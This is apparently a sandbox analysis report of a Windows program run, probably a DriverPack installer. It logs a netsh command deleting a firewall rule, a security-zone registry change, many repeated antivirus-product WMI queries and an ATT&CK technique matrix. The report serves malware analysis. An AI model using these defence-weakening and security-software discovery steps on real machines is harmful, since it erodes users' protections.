Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\expand.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="DriverPack aria2c.exe"
Source: C:\Windows\SysWOW64\mshta.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_8360.txt"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts331
Windows Management Instrumentation
1
BITS Jobs
1
Windows Service
3
Masquerading
OS Credential Dumping32
Security Software Discovery
Remote Services1
Email Collection
Exfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts11
Command and Scripting Interpreter
1
Windows Service
11
Process Injection
3
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop Protocol1
Man in the Browser
Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Scripting
Logon Script (Windows)Logon Script (Windows)231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Exploitation for Client Execution
Logon Script (Mac)Logon Script (Mac)1
BITS Jobs
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud Accounts1
PowerShell
Network Logon ScriptNetwork Logon Script11
Process Injection
LSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Deobfuscate/Decode Files or Information
